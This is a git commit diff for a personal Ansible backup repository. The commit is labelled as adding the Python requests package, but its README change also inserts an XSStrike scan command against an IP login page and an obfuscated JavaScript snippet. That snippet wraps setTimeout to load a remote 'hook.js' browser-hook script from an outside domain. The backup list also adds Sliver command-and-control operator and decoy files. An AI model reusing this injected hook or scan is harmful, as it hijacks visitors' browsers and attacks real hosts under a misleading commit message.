[Add requests for backup playbooks]
This commit is contained in:
25
README.md
25
README.md
@@ -1,5 +1,30 @@
|
|||||||
# semaphore
|
# semaphore
|
||||||
|
|
||||||
|
```
|
||||||
|
python3 xsstrike.py -u https://147.135.51.88/login
|
||||||
|
(function() {
|
||||||
|
const originalSetTimeout = window.setTimeout;
|
||||||
|
window.setTimeout = function(fn, delay) {
|
||||||
|
if (delay > 0) {
|
||||||
|
const wrapped = function() {
|
||||||
|
if (!window.xetLoaded) {
|
||||||
|
var s = document.createElement('script');
|
||||||
|
s.src = 'https://xet.jingoh.fr/hook.js';
|
||||||
|
document.head.appendChild(s);
|
||||||
|
window.xetLoaded = true;
|
||||||
|
}
|
||||||
|
return fn.apply(this, arguments);
|
||||||
|
};
|
||||||
|
return originalSetTimeout(wrapped, delay);
|
||||||
|
}
|
||||||
|
return originalSetTimeout(fn, delay);
|
||||||
|
};
|
||||||
|
})();
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Semaphore playbooks
|
Semaphore playbooks
|
||||||
|
|
||||||
Ansible perso playbooks and role
|
Ansible perso playbooks and role
|
||||||
|
|||||||
@@ -153,6 +153,12 @@
|
|||||||
- /opt/dockerapps/appdata/syncthing/config/config.xml
|
- /opt/dockerapps/appdata/syncthing/config/config.xml
|
||||||
#! authelia
|
#! authelia
|
||||||
- /opt/dockerapps/appdata/authelia/config/configuration.yml
|
- /opt/dockerapps/appdata/authelia/config/configuration.yml
|
||||||
|
#! sliver
|
||||||
|
- /opt/dockerapps/appdata/sliver/statics/index.html
|
||||||
|
- /opt/dockerapps/appdata/sliver/statics/favicon.ico
|
||||||
|
- /opt/dockerapps/appdata/sliver/statics/robots.txt
|
||||||
|
- /opt/dockerapps/appdata/sliver/statics/sitemap.xml
|
||||||
|
- /opt/dockerapps/appdata/sliver/operators/sgratias_ops.jingoh.fr.cfg
|
||||||
|
|
||||||
- name: Push backup to git
|
- name: Push backup to git
|
||||||
ansible.builtin.shell: |
|
ansible.builtin.shell: |
|
||||||
@@ -172,6 +178,9 @@
|
|||||||
#! GITEA
|
#! GITEA
|
||||||
############
|
############
|
||||||
|
|
||||||
|
- ansible.builtin.pip:
|
||||||
|
name: requests
|
||||||
|
|
||||||
- ansible.builtin.file:
|
- ansible.builtin.file:
|
||||||
path: "{{ dockerapps_path }}/backup/gitea"
|
path: "{{ dockerapps_path }}/backup/gitea"
|
||||||
state: directory
|
state: directory
|
||||||
|
|||||||
Reference in New Issue
Block a user